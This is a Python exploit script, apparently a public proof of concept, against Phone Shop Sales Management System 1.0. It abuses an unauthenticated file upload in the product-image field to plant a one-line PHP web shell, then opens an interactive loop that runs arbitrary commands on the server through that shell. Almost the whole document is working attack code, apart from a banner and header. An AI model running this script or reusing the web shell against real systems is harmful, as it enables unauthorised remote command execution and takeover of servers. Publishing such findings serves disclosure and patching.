# Exploit Title: Phone Shop Sales Management System - Arbitrary File Upload (Unauthenticated)
# Date: 20/04/21
# Exploit Author: Richard Jones
# Vendor Homepage: https://www.sourcecodester.com/php/10882/phone-shop-sales-managements-system.html
# Version: 1.0
# Tested on: Windows 10 build 19041 + xampp 3.2.4
import requests
import sys
IP="127.0.0.1" # CHANGE ME
ADDURL=f"http://{IP}/osms/Execute/ExAddProduct.php"
CALLSHELLURL=f"http://{IP}/osms/assets/img/Product_Uploaded/rev.php"
s = requests.Session()
def postShell():
data = {
"ProductName":"1",
"BrandName":"1",
"ProductPrice":1,
"Quantity":"1",
"TotalPrice":1,
"DisplaySize":"1",
"OperatingSystem":"1",
"Processor":"1",
"InternalMemory":"1",
"RAM":"1",
"CameraDescription":"1",
"BatteryLife":"1",
"Weight":"1",
"Model":"1",
"Dimension":"1",
"date2":"1",
"Description":"1",
"_wysihtml5_mode":"1",
}
fileData = {
'ProductImage':("rev.php","<?php system($_GET['c']);?>", "application/octet-stream")}
r = s.post(ADDURL, files=fileData, data=data)
if "The product is successfully added" in r.text:
return True
else:
return False
def runWebShell():
try:
while True:
cmd=input("\033[32;1m" +"$: "+ "\033[0m")
if cmd == "exit":
sys.exit()
r = s.get(f"{CALLSHELLURL}?c={cmd}", verify=False)
if r.status_code == 200:
print(r.text)
else:
raise Exception("Cmd error")
except KeyboardInterrupt():
sys.exit()
def banner():
ban = r"""__________.__ _________.__ _________ .__ _____ _________
\______ \ |__ ____ ____ ____ / _____/| |__ ____ ______ / _____/____ | | ____ ______ / \ / _____/
| ___/ | \ / _ \ / \_/ __ \ \_____ \ | | \ / _ \\____ \ \_____ \\__ \ | | _/ __ \ / ___/ / \ / \ \_____ \
| | | Y ( <_> ) | \ ___/ / \| Y ( <_> ) |_> > / \/ __ \| |_\ ___/ \___ \ / Y \ / \
|____| |___| /\____/|___| /\___ > /_______ /|___| /\____/| __/ /_______ (____ /____/\___ >____ > \____|__ / /\ /_______ / /\
\/ \/ \/ \/ \/ |__| \/ \/ \/ \/ \/ \/ \/ \/ """
return ban
def main():
print("\033[34;1m" + banner() + "\033[0m")
print("\033[32;1m" + "Created by Richard Jones 20/04/2021"+ "\033[0m" + "\n")
print("\033[72;1m" +"[+] Sending WebShell..."+ "\033[0m")
if postShell():
print("\033[72;1m" +"[+] Calling WebShell..."+ "\033[0m")
runWebShell()
if __name__ == "__main__":
main()